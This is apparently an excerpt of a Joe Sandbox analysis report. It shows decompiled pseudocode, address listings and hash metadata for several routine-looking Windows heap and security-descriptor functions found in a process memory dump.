																goto L63;
															} else {
																 *(_t297 + 2) =  *(_t297 + 2) +  *(_t264 + 2);
																__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																	goto L76;
																} else {
																	E04CF88C0(_t281, _t264,  *(_t264 + 2) & 0x0000ffff);
																	_t264 = _v20;
																	_t298 = _t298 + 0xc;
																	 *(_t297 + 4) =  *(_t297 + 4) + 1;
																	_t281 = _v12 + ( *(_t264 + 2) & 0x0000ffff);
																	__eflags = _t281;
																	_v12 = _t281;
																	goto L63;
																}
															}
															goto L75;
															L63:
															_t295 = _t295 + 1;
															_t264 = _t264 + ( *(_t264 + 2) & 0x0000ffff);
															_t209 = _a4;
															_v20 = _t264;
															__eflags = _t295 - ( *(_t209 + 4) & 0x0000ffff);
														} while (_t295 < ( *(_t209 + 4) & 0x0000ffff));
														goto L64;
													}
												}
											}
										} else {
											__eflags = _a16 - _t259;
											if(_a16 != _t259) {
												_t231 = _t259;
												_t269 = _t292 + 8;
												_v20 = _t231;
												__eflags = 0 -  *(_t292 + 4);
												while(1) {
													_v28 = _t269;
													if(__eflags >= 0) {
														goto L40;
													}
													__eflags =  *_t269 - 0x12;
													if( *_t269 != 0x12) {
														L38:
														_v20 = _t231 + 1;
														_t269 = _t269 + ( *(_t269 + 2) & 0x0000ffff);
														__eflags = _v20 - ( *(_t292 + 4) & 0x0000ffff);
														_t231 = _v20;
														continue;
													} else {
														__eflags =  *(_t269 + 1) & 0x00000010;
														if(( *(_t269 + 1) & 0x00000010) != 0) {
															goto L38;
														} else {
															_t236 = E04D4C619(_t269, _t297, _t259,  &_v5);
															_t269 = _v28;
															__eflags = _t236;
															if(_t236 != 0) {
																L37:
																_t231 = _v20;
																goto L38;
															} else {
																 *(_t297 + 2) =  *(_t297 + 2) +  *(_t269 + 2);
																__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																	goto L76;
																} else {
																	E04CF88C0(_v12, _t269,  *(_t269 + 2) & 0x0000ffff);
																	_t269 = _v28;
																	_t298 = _t298 + 0xc;
																	 *(_t297 + 4) =  *(_t297 + 4) + 1;
																	_t81 =  &_v12;
																	 *_t81 = _v12 + ( *(_t269 + 2) & 0x0000ffff);
																	__eflags =  *_t81;
																	goto L37;
																}
															}
														}
													}
													goto L75;
												}
											}
											goto L40;
										}
									} else {
										_v28 = _t259;
										_t296 = _t193 + 8;
										__eflags = 0 -  *((intOrPtr*)(_t193 + 4));
										if(0 >=  *((intOrPtr*)(_t193 + 4))) {
											L28:
											_t292 = _a8;
											goto L29;
										} else {
											do {
												__eflags =  *_t296 - 0x12;
												if( *_t296 != 0x12) {
													goto L27;
												} else {
													__eflags =  *(_t296 + 1) & 0x00000010;
													if(( *(_t296 + 1) & 0x00000010) != 0) {
														goto L27;
													} else {
														_t246 = E04D4C619(_t296, _t297, _t259,  &_v5);
														__eflags = _t246;
														if(_t246 != 0) {
															goto L27;
														} else {
															_t247 = _a8;
															__eflags = _t247;
															if(_t247 == 0) {
																L20:
																_t248 = _t259;
															} else {
																__eflags = _a16 - _t259;
																if(_a16 != _t259) {
																	goto L20;
																} else {
																	_t248 = E04D4C619(_t296, _t247, 1,  &_v5);
																}
															}
															__eflags = _t248;
															if(_t248 == 0) {
																L25:
																 *(_t297 + 2) =  *(_t297 + 2) +  *(_t296 + 2);
																__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																	goto L76;
																} else {
																	E04CF88C0(_v12, _t296,  *(_t296 + 2) & 0x0000ffff);
																	_t298 = _t298 + 0xc;
																	 *(_t297 + 4) =  *(_t297 + 4) + 1;
																	_t52 =  &_v12;
																	 *_t52 = _v12 + ( *(_t296 + 2) & 0x0000ffff);
																	__eflags =  *_t52;
																	goto L27;
																}
															} else {
																__eflags = _v5 - _t259;
																if(_v5 == _t259) {
																	goto L25;
																} else {
																	 *(_t297 + 2) =  *(_t297 + 2) +  *(_t296 + 2);
																	__eflags = ( *(_t297 + 2) & 0x0000ffff) - _v16;
																	if(( *(_t297 + 2) & 0x0000ffff) > _v16) {
																		L76:
																		E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t259, _t297);
																		goto L77;
																	} else {
																		E04CF88C0(_v12, _t296,  *(_t296 + 2) & 0x0000ffff);
																		_t289 = _v12;
																		_t298 = _t298 + 0xc;
																		 *(_t297 + 4) =  *(_t297 + 4) + 1;
																		 *(_t289 + 1) =  *(_t289 + 1) | 0x00000010;
																		_v12 = _t289 + ( *(_t296 + 2) & 0x0000ffff);
																		goto L27;
																	}
																}
															}
														}
													}
												}
												goto L75;
												L27:
												_v28 = _v28 + 1;
												_t296 = _t296 + ( *(_t296 + 2) & 0x0000ffff);
												_t243 = _a4;
												__eflags = _v28 - ( *(_t243 + 4) & 0x0000ffff);
											} while (_v28 < ( *(_t243 + 4) & 0x0000ffff));
											goto L28;
										}
									}
								} else {
									_v24 = 0xc0000017;
									L78:
									_t260 = _a12;
								}
							}
						}
					}
				} else {
					_v24 = 0xc000000d;
				}
				L75:
				 *_t260 = _t259;
				return _v24;
			}

0x04d4c7b8
0x04d4c7bc
0x04d4c7be
0x04d4c7c1
0x04d4c7c5
0x04d4c7ca
0x04d4c7d8
0x04d4c7db
0x04d4c7de
0x04d4c7e0
0x04d4c7ee
0x00000000
0x04d4c7e2
0x04d4c7e2
0x04d4c7e4
0x04d4cbaa
0x04d4cbaa
0x04d4c7ea
0x04d4c7ea
0x04d4c7f2
0x04d4c7f2
0x04d4c7f4
0x04d4c7fc
0x04d4c7f6
0x04d4c7f6
0x04d4c7f6
0x04d4c7fe
0x04d4c802
0x04d4c803
0x04d4c806
0x04d4c808
0x04d4cbc8
0x04d4cbc8
0x00000000
0x04d4c80e
0x04d4c80e
0x04d4c828
0x04d4c82a
0x04d4c82c
0x04d4c83a
0x04d4c83c
0x04d4c841
0x04d4c842
0x04d4c845
0x04d4c849
0x04d4c84c
0x04d4c84f
0x04d4c852
0x04d4c854
0x04d4c946
0x04d4c946
0x04d4c948
0x04d4c9d1
0x04d4c9d1
0x04d4c9d4
0x04d4c9d6
0x04d4cb3e
0x04d4cb3e
0x04d4cb40
0x04d4cba7
0x04d4cba7
0x00000000
0x04d4cb42
0x04d4cb42
0x04d4cb45
0x04d4cb4c
0x04d4cb4f
0x04d4cb51
0x04d4cb55
0x04d4cba2
0x04d4cba2
0x04d4cba5
0x00000000
0x00000000
0x04d4cb5a
0x04d4cb5d
0x04d4cb92
0x04d4cb96
0x04d4cb97
0x04d4cba0
0x00000000
0x04d4cb5f
0x04d4cb63
0x04d4cb6b
0x04d4cb6e
0x00000000
0x04d4cb70
0x04d4cb77
0x04d4cb7f
0x04d4cb82
0x04d4cb8a
0x04d4cb8d
0x04d4cb8d
0x04d4cb8f
0x00000000
0x04d4cb8f
0x04d4cb6e
0x00000000
0x04d4cb5d
0x04d4cba2
0x00000000
0x04d4cb45
0x04d4c9dc
0x04d4c9dc
0x04d4c9df
0x04d4c9e2
0x04d4c9e6
0x04d4c9ea
0x04d4c9ed
0x04d4c9f2
0x04d4c9f5
0x04d4c9f8
0x04d4cadc
0x00000000
0x04d4c9fe
0x04d4c9fe
0x04d4c9fe
0x04d4ca01
0x00000000
0x04d4ca07
0x04d4ca07
0x04d4ca0b
0x00000000
0x04d4ca11
0x04d4ca1a
0x04d4ca1f
0x04d4ca21
0x04d4cab9
0x00000000
0x04d4ca27
0x04d4ca27
0x04d4ca2a
0x04d4ca2c
0x04d4ca3f
0x04d4ca2e
0x04d4ca38
0x04d4ca38
0x04d4ca41
0x04d4ca43
0x04d4ca86
0x04d4ca8a
0x04d4ca92
0x04d4ca95
0x00000000
0x04d4ca9b
0x04d4caa4
0x04d4caa9
0x04d4caac
0x04d4caaf
0x04d4cab3
0x00000000
0x04d4cab3
0x04d4ca45
0x04d4ca45
0x04d4ca48
0x00000000
0x04d4ca4a
0x04d4ca4e
0x04d4ca56
0x04d4ca59
0x00000000
0x04d4ca5f
0x04d4ca68
0x04d4ca6d
0x04d4ca70
0x04d4ca73
0x04d4ca77
0x04d4ca77
0x04d4ca77
0x04d4ca7b
0x04d4ca7f
0x04d4ca81
0x00000000
0x04d4ca81
0x04d4ca59
0x04d4ca48
0x04d4ca43
0x04d4ca21
0x04d4ca0b
0x00000000
0x04d4cabc
0x04d4cac0
0x04d4cac3
0x04d4cac8
0x04d4cace
0x04d4cace
0x04d4cad7
0x04d4cadf
0x04d4cadf
0x04d4cae2
0x04d4cae4
0x04d4cae8
0x04d4cb3b
0x04d4cb3b
0x00000000
0x04d4caea
0x04d4caea
0x04d4caea
0x04d4caed
0x00000000
0x04d4caef
0x04d4caf3
0x04d4cafb
0x04d4cafe
0x00000000
0x04d4cb04
0x04d4cb0b
0x04d4cb10
0x04d4cb13
0x04d4cb16
0x04d4cb21
0x04d4cb21
0x04d4cb23
0x00000000
0x04d4cb23
0x04d4cafe
0x00000000
0x04d4cb26
0x04d4cb2a
0x04d4cb2b
0x04d4cb2d
0x04d4cb30
0x04d4cb37
0x04d4cb37
0x00000000
0x04d4caea
0x04d4cae8
0x04d4c9f8
0x04d4c94e
0x04d4c94e
0x04d4c951
0x04d4c953
0x04d4c955
0x04d4c95a
0x04d4c95d
0x04d4c9cc
0x04d4c9cc
0x04d4c9cf
0x00000000
0x00000000
0x04d4c963
0x04d4c966
0x04d4c9b8
0x04d4c9b9
0x04d4c9c0
0x04d4c9c6
0x04d4c9c9
0x00000000
0x04d4c968
0x04d4c968
0x04d4c96c
0x00000000
0x04d4c96e
0x04d4c975
0x04d4c97a
0x04d4c97d
0x04d4c97f
0x04d4c9b5
0x04d4c9b5
0x00000000
0x04d4c981
0x04d4c985
0x04d4c98d
0x04d4c990
0x00000000
0x04d4c996
0x04d4c99f
0x04d4c9a4
0x04d4c9a7
0x04d4c9aa
0x04d4c9b2
0x04d4c9b2
0x04d4c9b2
0x00000000
0x04d4c9b2
0x04d4c990
0x04d4c97f
0x04d4c96c
0x00000000
0x04d4c966
0x04d4c9cc
0x00000000
0x04d4c951
0x04d4c85a
0x04d4c85c
0x04d4c85f
0x04d4c862
0x04d4c866
0x04d4c943
0x04d4c943
0x00000000
0x04d4c86c
0x04d4c86c
0x04d4c86c
0x04d4c86f
0x00000000
0x04d4c875
0x04d4c875
0x04d4c879
0x00000000
0x04d4c87f
0x04d4c888
0x04d4c88d
0x04d4c88f
0x00000000
0x04d4c895
0x04d4c895
0x04d4c898
0x04d4c89a
0x04d4c8b2
0x04d4c8b2
0x04d4c89c
0x04d4c89c
0x04d4c89f
0x00000000
0x04d4c8a1
0x04d4c8ab
0x04d4c8ab
0x04d4c89f
0x04d4c8b4
0x04d4c8b6
0x04d4c8f9
0x04d4c8fd
0x04d4c905
0x04d4c908
0x00000000
0x04d4c90e
0x04d4c917
0x04d4c91c
0x04d4c91f
0x04d4c927
0x04d4c927
0x04d4c927
0x00000000
0x04d4c927
0x04d4c8b8
0x04d4c8b8
0x04d4c8bb
0x00000000
0x04d4c8bd
0x04d4c8c1
0x04d4c8c9
0x04d4c8cc
0x04d4cbb8
0x04d4cbc3
0x00000000
0x04d4c8d2
0x04d4c8db
0x04d4c8e0
0x04d4c8e3
0x04d4c8e6
0x04d4c8ea
0x04d4c8f4
0x00000000
0x04d4c8f4
0x04d4c8cc
0x04d4c8bb
0x04d4c8b6
0x04d4c88f
0x04d4c879
0x00000000
0x04d4c92a
0x04d4c92e
0x04d4c931
0x04d4c933
0x04d4c93a
0x04d4c93a
0x00000000
0x04d4c86c
0x04d4c866
0x04d4c82e
0x04d4c82e
0x04d4cbcf
0x04d4cbcf
0x04d4cbcf
0x04d4c82c
0x04d4c808
0x04d4c7e4
0x04d4c7cc
0x04d4c7cc
0x04d4c7cc
0x04d4cbac
0x04d4cbb1
0x04d4cbb5

Strings

w, xrefs: 04D4CBC8

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: w
API String ID: 0-476252946
Opcode ID: c529026b129437c4e87b3771afbb5b0928ff556b22233478c15afcefbb714190
Instruction ID: 43142a4c063d415dbc6851b53301e2fdd70d4fd08f045a4e08f7d0ccf795c79a
Opcode Fuzzy Hash: c529026b129437c4e87b3771afbb5b0928ff556b22233478c15afcefbb714190
Instruction Fuzzy Hash: E9D1CC30A11215ABDB24CF54C482ABFBBF1FF84B04F15845AE899AB241F335F991D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04D360A0 Relevance: 1.5, Strings: 1, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E04D360A0(void* __ecx, void* __edx, signed int* _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v24;
				signed int _v28;
				short _v32;
				char _v36;
				signed int* _v40;
				short _v44;
				char _v48;
				intOrPtr* _v52;
				signed int _v56;
				char _v60;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t69;
				signed int _t79;
				signed int _t80;
				signed int _t86;
				signed int* _t127;
				signed int _t128;
				signed int _t133;
				void* _t143;
				void* _t144;
				void* _t145;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				signed int _t150;
				signed int _t151;
				signed int _t155;

				_t143 = __edx;
				_v8 =  *0x4dab370 ^ _t155;
				_t127 = _a4;
				 *_t127 = 0;
				_t150 = 0;
				_v36 = 0;
				_v48 = 0;
				_v28 = 0;
				_v64 = 0;
				_v40 = _t127;
				_v32 = 0x500;
				_v44 = 0x100;
				_t69 = E04CC5D90(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
				_v52 = _t69;
				if(_t69 != 0) {
					_t130 =  &_v60;
					_push( &_v60);
					_push(0x48);
					_push(_t69);
					_push(4);
					_push(0xfffffffa);
					_t151 = E04CF2BC0();
					__eflags = _t151;
					if(_t151 < 0) {
						L29:
						E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v52);
						__eflags = _t151;
						if(_t151 >= 0) {
							L32:
							return E04CF4B50(_t151, _t127, _v8 ^ _t155, _t143, _t150, _t151);
						}
						L30:
						if( *_t127 != 0) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t127);
							 *_t127 =  *_t127 & 0x00000000;
						}
						goto L32;
					}
					_v56 = _v56 & 0;
					_push( &_v60);
					_push(4);
					_push( &_v56);
					_push(0x1d);
					_push(0xfffffffa);
					_t79 = E04CF2BC0();
					__eflags = _t79;
					if(_t79 < 0) {
						L11:
						_t133 = 0x34;
						__eflags = _t150;
						if(_t150 != 0) {
							_t133 = 0x44 + ( *( *_t150 + 1) & 0x000000ff) * 4;
						}
						_t80 = _v28;
						__eflags = _t80;
						if(_t80 != 0) {
							_t133 = _t133 + ( *(_t80 + 1) & 0x000000ff) * 4 + 0x10;
							__eflags = _t133;
						}
						_t152 = _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4;
						_t86 = E04CC5D90(_t133,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t133 + (( *( *_v52 + 1) & 0x000000ff) + 0xe) * 4);
						 *_t127 = _t86;
						__eflags = _t86;
						if(_t86 != 0) {
							E04CD7C20(_t86, _t152, 2);
							E04CD82F0( &_v24,  &_v36, 1);
							_v16 = 0x12;
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t144 = 2;
							E04CD366E( *_t127, _t144, __eflags);
							E04CD82F0( &_v24,  &_v36, 2);
							_push(0);
							_push( &_v24);
							_push(0x10000000);
							_push(0);
							_t145 = 2;
							_v16 = 0x20;
							_v12 = 0x220;
							E04CD366E( *_t127, _t145, __eflags);
							__eflags = _t150;
							if(__eflags != 0) {
								_push(0);
								_push( *_t150);
								_push(0x10000000);
								_push(0);
								_t149 = 2;
								E04CD366E( *_t127, _t149, __eflags);
							}
							_t128 = _v28;
							__eflags = _t128;
							if(__eflags == 0) {
								_t154 = _v40;
							} else {
								_push(0);
								_push(_t128);
								_push(0x10000000);
								_push(0);
								_t154 = _v40;
								_t148 = 2;
								E04CD366E( *_v40, _t148, __eflags);
							}
							_push(0);
							_push( *_v52);
							_push(0x10000000);
							_push(0);
							_t146 = 2;
							E04CD366E( *_t154, _t146, __eflags);
							E04CD82F0( &_v24,  &_v48, 1);
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_v16 = 0;
							_t147 = 2;
							E04CD366E( *_t154, _t147, __eflags);
							E04CD82F0( &_v24,  &_v36, 1);
							_push(0);
							_push( &_v24);
							_push(0x80000000);
							_push(0);
							_t143 = 2;
							_v16 = 7;
							E04CD366E( *_t154, _t143, __eflags);
							_t151 = 0;
							__eflags = 0;
							goto L24;
						} else {
							_t151 = 0xc0000017;
							L17:
							_t128 = _v28;
							L24:
							__eflags = _t150;
							if(_t150 != 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t150);
								_t128 = _v28;
							}
							__eflags = _t128;
							if(_t128 != 0) {
								E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t128);
							}
							_t127 = _v40;
							goto L29;
						}
					}
					__eflags = _v56;
					if(_v56 == 0) {
						goto L11;
					}
					_t150 = E04CC5D90( &_v60,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x48);
					__eflags = _t150;
					if(_t150 != 0) {
						_push( &_v60);
						_push(0x48);
						_push(_t150);
						_push(0x1f);
						_push(0xfffffffa);
						_t151 = E04CF2BC0();
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						_t151 = E04D464B0( &_v60,  *_t150,  &_v64);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						__eflags = _v64 - 1;
						if(__eflags != 0) {
							goto L11;
						}
						_t151 = E04D46400(_t130, _t143, __eflags,  *_t150,  &_v28);
						__eflags = _t151;
						if(_t151 < 0) {
							goto L17;
						}
						goto L11;
					}
					_t151 = 0xc0000017;
					goto L29;
				}
				_t151 = 0xc0000017;
				goto L30;
			}

0x04d360a0
0x04d360af
0x04d360b3
0x04d360bc
0x04d360be
0x04d360c1
0x04d360c4
0x04d360c7
0x04d360ca
0x04d360d3
0x04d360d6
0x04d360dc
0x04d360e5
0x04d360ea
0x04d360ef
0x04d360fb
0x04d360fe
0x04d360ff
0x04d36101
0x04d36102
0x04d36104
0x04d3610b
0x04d3610d
0x04d3610f
0x04d3632c
0x04d3633a
0x04d3633f
0x04d36341
0x04d3635d
0x04d3636d
0x04d3636d
0x04d36343
0x04d36346
0x04d36355
0x04d3635a
0x04d3635a
0x00000000
0x04d36346
0x04d36115
0x04d3611b
0x04d3611c
0x04d36121
0x04d36122
0x04d36124
0x04d36126
0x04d3612b
0x04d3612d
0x04d36194
0x04d36196
0x04d36197
0x04d36199
0x04d361a1
0x04d361a1
0x04d361a8
0x04d361ab
0x04d361ad
0x04d361b6
0x04d361b6
0x04d361b6
0x04d361c5
0x04d361d4
0x04d361d9
0x04d361db
0x04d361dd
0x04d361f0
0x04d361ff
0x04d3620b
0x04d36212
0x04d36213
0x04d36214
0x04d36219
0x04d3621c
0x04d3621d
0x04d3622c
0x04d36236
0x04d36237
0x04d36238
0x04d3623d
0x04d36240
0x04d36241
0x04d36248
0x04d3624f
0x04d36254
0x04d36256
0x04d3625a
0x04d3625b
0x04d3625d
0x04d36262
0x04d36265
0x04d36266
0x04d36266
0x04d3626b
0x04d3626e
0x04d36270
0x04d36289
0x04d36272
0x04d36272
0x04d36273
0x04d36274
0x04d36279
0x04d3627a
0x04d3627f
0x04d36282
0x04d36282
0x04d36291
0x04d36293
0x04d36295
0x04d3629a
0x04d3629e
0x04d3629f
0x04d362ae
0x04d362b8
0x04d362b9
0x04d362ba
0x04d362bf
0x04d362c2
0x04d362c7
0x04d362c8
0x04d362d7
0x04d362e1
0x04d362e3
0x04d362e4
0x04d362e9
0x04d362ed
0x04d362ee
0x04d362f5
0x04d362fa
0x04d362fa
0x00000000
0x04d361df
0x04d361df
0x04d361e4
0x04d361e4
0x04d362fc
0x04d362fc
0x04d362fe
0x04d3630c
0x04d36311
0x04d36311
0x04d36314
0x04d36316
0x04d36324
0x04d36324
0x04d36329
0x00000000
0x04d36329
0x04d361dd
0x04d3612f
0x04d36132
0x00000000
0x00000000
0x04d36146
0x04d36148
0x04d3614a
0x04d36159
0x04d3615a
0x04d3615c
0x04d3615d
0x04d3615f
0x04d36166
0x04d36168
0x04d3616a
0x00000000
0x00000000
0x04d36177
0x04d36179
0x04d3617b
0x00000000
0x00000000
0x04d3617d
0x04d36181
0x00000000
0x00000000
0x04d3618e
0x04d36190
0x04d36192
0x00000000
0x00000000
0x00000000
0x04d36192
0x04d3614c
0x00000000
0x04d3614c
0x04d360f1
0x00000000

Strings

, xrefs: 04D36241

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: defada57c4f5c1fa47187b862ec726ca88d7d0010bbf3f9c25fc9131f7ebecc9
Instruction ID: 6262e6d0bbe981f24c884722e821c3cee6eea8233dffacbe07cab39086922cfc
Opcode Fuzzy Hash: defada57c4f5c1fa47187b862ec726ca88d7d0010bbf3f9c25fc9131f7ebecc9
Instruction Fuzzy Hash: E6916C72A00219BBEB21DF95CD85FAEB7B9EF09714F140065E600AB291DB75FD00DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04CEA580 Relevance: 1.4, Strings: 1, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E04CEA580(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t88;
				signed short* _t89;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				signed int _t96;
				signed int _t100;
				void* _t101;
				signed int _t102;
				signed int _t104;
				signed int _t110;
				signed int _t115;
				signed int _t119;
				intOrPtr _t122;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t135;
				signed int _t136;
				void* _t137;
				signed char _t139;
				signed short* _t141;
				signed int _t144;
				signed int _t145;
				void* _t147;

				_t143 = __esi;
				_t140 = __edi;
				_push(0x3c);
				_push(0x4d8c9a0);
				E04D07BE4(__ebx, __edi, __esi);
				 *(_t147 - 0x48) =  *(_t147 + 0x10);
				_t110 =  *(_t147 + 8);
				 *(_t147 - 0x4c) = _t110;
				_t114 = 0;
				 *((char*)(_t147 - 0x19)) = 0;
				_t87 =  *[fs:0x30];
				if(( *(_t87 + 0x68) & 0x00000800) != 0) {
					__eflags =  *0x4da6d3c - _t114; // 0x0
					if(__eflags != 0) {
						L6:
						__eflags = _t110;
						if(_t110 == 0) {
							L9:
							 *(_t147 - 0x34) = _t114;
							 *(_t147 - 4) = _t114;
							__eflags = _t110;
							if(_t110 == 0) {
								L15:
								_t144 = _t114;
								 *(_t147 - 0x28) = _t144;
								_t128 = _t114;
								 *(_t147 - 0x40) = _t128;
								_t88 = 0x21;
								_t141 =  *(_t147 + 0x14);
								__eflags =  *_t141 - _t88;
								if( *_t141 != _t88) {
									 *(_t147 - 0x24) = _t114;
									L20:
									_t89 = _t141;
									 *(_t147 - 0x30) = _t89;
									while(1) {
										_t115 =  *_t89 & 0x0000ffff;
										__eflags = _t115;
										if(_t115 != 0) {
											goto L27;
										} else {
											break;
										}
										while(1) {
											L27:
											_t89 =  &(_t89[1]);
											 *(_t147 - 0x30) = _t89;
											__eflags = _t115;
											if(_t115 == 0) {
												break;
											}
											_t115 =  *_t89 & 0x0000ffff;
										}
										_t128 = _t128 + 1;
										 *(_t147 - 0x40) = _t128;
									}
									__eflags = _t128;
									if(_t128 == 0) {
										L50:
										_t145 = _t144 << 0x12;
										__eflags = _t145;
										L51:
										 *(_t147 - 0x34) = _t145;
										 *(_t147 - 4) = 0xfffffffe;
										E04D266C4(_t110);
										_t91 = _t145;
										L2:
										 *[fs:0x0] =  *((intOrPtr*)(_t147 - 0x10));
										return _t91;
									}
									_t119 = E04D57786(_t110, _t128);
									 *(_t147 - 0x20) = _t119;
									__eflags = _t119;
									if(_t119 == 0) {
										goto L50;
									}
									_t93 = 0x17;
									 *(_t147 - 0x2c) = _t93;
									 *(_t147 - 0x44) = _t93;
									_t144 =  *(_t119 + 0xc) & 0x0000ffff;
									 *(_t147 - 0x28) = _t144;
									__eflags = _t144;
									if(_t144 != 0) {
										__eflags = _t144 - 0x800;
										if(_t144 != 0x800) {
											L34:
											_t129 =  *(_t147 + 0x10);
											__eflags = _t129;
											if(_t129 == 0) {
												L42:
												_t94 = 0;
												__eflags = 0;
												_t130 = 0;
												 *(_t147 - 0x24) = 0;
												L43:
												 *(_t147 - 0x3c) = _t130;
												 *(_t147 - 0x30) = _t141;
												while(1) {
													__eflags =  *_t141;
													_t110 =  *(_t147 + 8);
													if( *_t141 == 0) {
														goto L50;
													}
													_t120 = _t119 + 0x10;
													 *((intOrPtr*)(_t147 - 0x38)) = _t119 + 0x10;
													__eflags = _t130;
													if(_t130 != 0) {
														E04CD5C3F(_t120,  *(_t147 - 0x2c) +  *(_t147 - 0x2c), _t130);
														_t94 =  *(_t147 - 0x24);
														_t122 =  *((intOrPtr*)(_t147 - 0x38));
														_t120 = _t122 + _t94 * 2;
														 *((intOrPtr*)(_t147 - 0x38)) = _t122 + _t94 * 2;
													}
													__eflags =  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94;
													E04CD5C3F(_t120,  *(_t147 - 0x2c) - _t94 +  *(_t147 - 0x2c) - _t94, _t141);
													do {
														_t96 =  *_t141 & 0x0000ffff;
														_t141 =  &(_t141[1]);
														 *(_t147 - 0x30) = _t141;
														__eflags = _t96;
													} while (_t96 != 0);
													_t119 =  *(_t147 - 0x20) + 0x40;
													 *(_t147 - 0x20) = _t119;
													_t94 =  *(_t147 - 0x24);
													_t130 =  *(_t147 - 0x3c);
												}
												goto L50;
											}
											_t54 = _t129 + 2; // 0x3
											 *(_t147 - 0x3c) = _t54;
											do {
												_t100 =  *_t129;
												_t129 = _t129 + 2;
												__eflags = _t100;
											} while (_t100 != 0);
											_t135 = _t129 -  *(_t147 - 0x3c);
											__eflags = _t135;
											_t136 = _t135 >> 1;
											 *(_t147 - 0x24) = _t136;
											 *(_t147 - 0x3c) = _t136;
											if(_t135 == 0) {
												goto L42;
											}
											__eflags = _t136 - 0x13;
											if(_t136 < 0x13) {
												_t101 = 0x17;
												_t102 = _t101 - _t136;
												__eflags = _t102;
												 *(_t147 - 0x2c) = _t102;
												 *(_t147 - 0x44) = _t102;
												_t94 =  *(_t147 - 0x24);
											} else {
												_t94 = 0;
												 *(_t147 - 0x24) = 0;
											}
											__eflags =  *(_t147 - 0x3c) - 0x13;
											asm("sbb edx, edx");
											_t130 = _t136 &  *(_t147 - 0x48);
											goto L43;
										}
										_push(L"GlobalTags");
										L32:
										_t137 = 0x2e;
										__eflags = _t119 + 0x10;
										E04CD5C3F(_t119 + 0x10, _t137);
										_t119 =  *(_t147 - 0x20);
										L33:
										_t119 = _t119 + 0x40;
										__eflags = _t119;
										 *(_t147 - 0x20) = _t119;
										_t144 =  *(_t119 + 0xc) & 0x0000ffff;
										 *(_t147 - 0x28) = _t144;
										goto L34;
									}
									_t104 =  *(_t147 - 0x24);
									__eflags = _t104;
									if(_t104 == 0) {
										goto L33;
									}
									_push(_t104);
									goto L32;
								}
								_t36 =  &(_t141[1]); // 0x12
								 *(_t147 - 0x24) = _t36;
								while(1) {
									_t141 =  &(_t141[1]);
									 *(_t147 + 0x14) = _t141;
									__eflags = _t88;
									if(_t88 == 0) {
										goto L20;
									}
									_t88 =  *_t141 & 0x0000ffff;
								}
								goto L20;
							}
							_t139 =  *(_t147 + 0xc) |  *(_t110 + 0x44);
							__eflags = _t139 & 0x61000000;
							asm("bt edx, 0x1c");
							__eflags = (_t87 & 0xffffff00 | (_t139 & 0x61000000) >= 0x00000000) & (_t114 & 0xffffff00 | (_t139 & 0x61000000) != 0x00000000);
							if(__eflags == 0) {
								__eflags = _t139 & 0x00000001;
								if((_t139 & 0x00000001) == 0) {
									E04CBFED0( *((intOrPtr*)(_t110 + 0xc8)));
									 *((char*)(_t147 - 0x19)) = 1;
								}
								_t114 = 0;
								__eflags = 0;
								goto L15;
							}
							_push( *(_t147 + 0x14));
							_push( *(_t147 + 0x10));
							_t145 = E04D5F76A(_t110, _t110, _t139, _t140, _t143, __eflags);
							goto L51;
						}
						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0xddeeddee;
						if( *((intOrPtr*)(_t110 + 8)) == 0xddeeddee) {
							goto L1;
						}
						__eflags =  *(_t110 + 0x44) & 0x01000000;
						if(( *(_t110 + 0x44) & 0x01000000) != 0) {
							goto L1;
						}
						goto L9;
					}
					_t87 = E04CC5D90(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x258);
